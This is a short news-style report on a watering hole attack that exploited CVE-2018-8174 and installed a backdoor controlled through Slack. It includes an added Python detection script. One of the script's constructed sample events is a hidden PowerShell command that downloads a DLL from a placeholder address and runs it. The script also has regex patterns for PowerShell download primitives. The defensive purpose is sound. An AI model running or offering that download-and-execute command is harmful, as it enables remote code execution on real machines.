Hackers have infiltrated the popular business chat software, Slack, using a watering hole attack.
An undocumented backdoor program was used by the hackers during the attack on Slack. The program was designed to give the hackers control of infected computers through Slack.
The “watering hole” attack is a technique for compromising websites that the intended victims are known to visit.
It’s unclear how victims were directed to the website, but the site was manipulated to host an exploit that takes advantage of a vulnerability in the Windows VBScript engine. The vulnerability, CVE-2018-8174, can be exploited through Internet Explorer; Microsoft patched it in May 2018. This is why keeping the operating system up to date is important.
When the exploit triggered successfully, a multi-stage infection chain would begin. First, a malicious DLL file would be downloaded and executed via PowerShell. This DLL scanned for antivirus programs before deciding whether to install the aforementioned backdoor program.
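The chain above has a stage that is easy to watch for in endpoint telemetry: a browser process (Internet Explorer) spawning PowerShell, and that PowerShell instance downloading and running a DLL. The script below is an added example and not part of the original report; it runs two such rules over constructed process-creation events (the hostnames, paths and timestamps are made up for the example) and returns the events that match.

```python
"""Detection example: flag the browser -> PowerShell -> DLL stage of a watering hole infection chain."""
import re
from typing import Dict, List

# Constructed sample process-creation events, tab-separated: time, parent image, child image, command line.
# These are made up for the example and are not telemetry from the incident described above.
SAMPLE_EVENTS = [
    "2019-03-01T10:00:01Z\texplorer.exe\tiexplore.exe\tiexplore.exe http://intranet.example.test/news",
    "2019-03-01T10:00:09Z\tiexplore.exe\tpowershell.exe\tpowershell.exe -nop -w hidden -c "
    "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/x.dll','C:\\Users\\Public\\x.dll'); "
    "rundll32 C:\\Users\\Public\\x.dll,Start",
    "2019-03-01T10:01:00Z\texplorer.exe\tpowershell.exe\tpowershell.exe -File C:\\scripts\\backup.ps1",
    "2019-03-01T10:02:00Z\tsvchost.exe\tpowershell.exe\tpowershell.exe -c "
    "Invoke-WebRequest http://updates.example.test/agent.dll -OutFile C:\\Temp\\agent.dll",
]

# Browsers that should never be the parent of a script host in normal use.
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Common PowerShell download primitives, and signs that the payload is a DLL being loaded.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I
)
DLL_RE = re.compile(r"\.dll\b|rundll32", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Split one tab-separated event into its fields; image names are lower-cased for matching."""
    ts, parent, child, cmd = line.split("\t", 3)
    return {"time": ts, "parent": parent.lower(), "child": child.lower(), "cmd": cmd}


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (an empty list means no rule fired)."""
    hits: List[str] = []
    # Rule 1: a browser launching a script host, the shape an in-browser exploit leaves behind.
    if event["parent"] in BROWSERS and event["child"] in SCRIPT_HOSTS:
        hits.append("browser_spawned_script_host")
    # Rule 2: PowerShell fetching something from the network and handling a DLL in the same command.
    if event["child"] == "powershell.exe" and DOWNLOAD_RE.search(event["cmd"]) and DLL_RE.search(event["cmd"]):
        hits.append("powershell_downloads_dll")
    return hits


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run both rules over a list of events and return one finding per matching event."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        hits = evaluate(event)
        if hits:
            findings.append({"time": event["time"], "child": event["child"], "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

On the constructed events only the two download-and-run PowerShell launches produce findings; the Internet Explorer-spawned one trips both rules, while the backup script spawned from Explorer stays quiet. The first rule is the higher-confidence signal here because it does not depend on the command line, which an attacker can obfuscate.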
The goal of the hack was to collect information on victims, including their social media activity and private chat logs. The backdoor also has the ability to start and close applications on the victim's device (including viruses), take screenshots, steal personal files, enable and view the victim's webcam, or completely destroy the device.